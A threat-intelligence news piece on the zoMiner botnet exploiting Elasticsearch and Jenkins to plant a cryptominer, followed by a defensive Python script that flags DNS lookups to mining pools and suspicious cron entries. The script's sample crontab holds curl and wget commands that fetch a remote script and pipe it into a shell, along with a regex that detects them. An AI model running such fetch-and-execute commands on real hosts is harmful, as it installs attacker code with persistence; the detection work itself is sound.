After being discovered in November 2020, the zoMiner botnet has shifted direction to target vulnerable versions of Elasticsearch and Jenkins servers. According to Qihoo 360’s Network Security Research Lab, the botnet is scanning for unpatched versions of Elasticsearch and Jenkins in an attempt to exploit CVE-2015-1427 for Elasticsearch and an unmentioned CVE for Jenkins. The exploit attempts to download and execute a shell script listed as a txt file. Once the shell script is launched, zoMiner attempts to terminate any competing miners on the host, set up persistence via cron, and start the miner. Currently, zoMiner has amassed over $4,500 USD worth of cryptocurrency.
zoMiner Botnet is Targeting Elasticsearch and Jenkins Servers
Exploiting vulnerable versions of software like Elasticsearch or Jenkins is right in line with how other botnet operators have run campaigns in the past and will likely remain a popular attack method. Collecting and monitoring DNS logs to catch hosts reaching out to popular cryptocurrency pools, and collecting process logs from hosts, can be invaluable in protecting an organization and its servers. While cryptocurrency mining has always been viewed as small fish compared to ransomware and other risks in the current threat landscape, there are still reasons to get ahead in protecting valued hosts. In the past, sophisticated threat actors have used miners as a guise for data exfiltration, which poses a significant threat to organizations. As the world of entry-as-a-service expands with malspam, it is important to protect against all forms of unauthorized remote access, no matter how great or small the initial damage appears to be. Any type of remote code execution that is allowed to persist can quickly turn into a major incident at the whim of the attacker.
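One way to apply the DNS and host monitoring advice above, as an added example that is not part of the original article: it flags clients that look up mining-pool domains and cron entries that fetch a script and pipe it to a shell. The log format, the pool domains, the addresses and every sample line are constructed assumptions.

```python
import re

# Assumed watchlist of pool domains (constructed placeholders); use a maintained feed in practice.
POOL_SUFFIXES = ("minepool.example", "xmr-pool.example")

# Constructed DNS query log, assumed format: "<timestamp> <client_ip> <qtype> <qname>"
DNS_LOG = """\
2021-03-08T10:00:01Z 10.0.4.17 A updates.example.org
2021-03-08T10:00:05Z 10.0.4.23 A eu.minepool.example.
2021-03-08T10:00:09Z 10.0.4.23 AAAA EU.MinePool.Example
2021-03-08T10:00:12Z 10.0.4.31 A notminepool.example
malformed line
"""

# Constructed crontab contents collected from a host
CRON = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://dl.example/x.txt | sh
@reboot wget -q -O - http://dl.example/x.txt | bash
"""

# A download tool whose output is piped straight into a shell (one core pattern only)
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da|z)?sh\b")

def is_pool(qname, suffixes=POOL_SUFFIXES):
    """Match on label boundaries so 'notminepool.example' does not hit."""
    name = qname.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in suffixes)

def pool_lookups(log_text):
    """Return {client_ip: set of normalized pool names that client queried}."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:  # skip lines that do not fit the assumed format
            continue
        client, qname = parts[1], parts[3]
        if is_pool(qname):
            hits.setdefault(client, set()).add(qname.rstrip(".").lower())
    return hits

def suspicious_cron(cron_text):
    """Return non-comment cron lines that fetch a script and pipe it to a shell."""
    lines = (l.strip() for l in cron_text.splitlines())
    return [l for l in lines if l and not l.startswith("#") and FETCH_EXEC.search(l)]

if __name__ == "__main__":
    print(pool_lookups(DNS_LOG))
    print(suspicious_cron(CRON))
```

The cron check covers only the pipe-to-shell form; a script saved to disk and run in a separate command needs the process logs mentioned above.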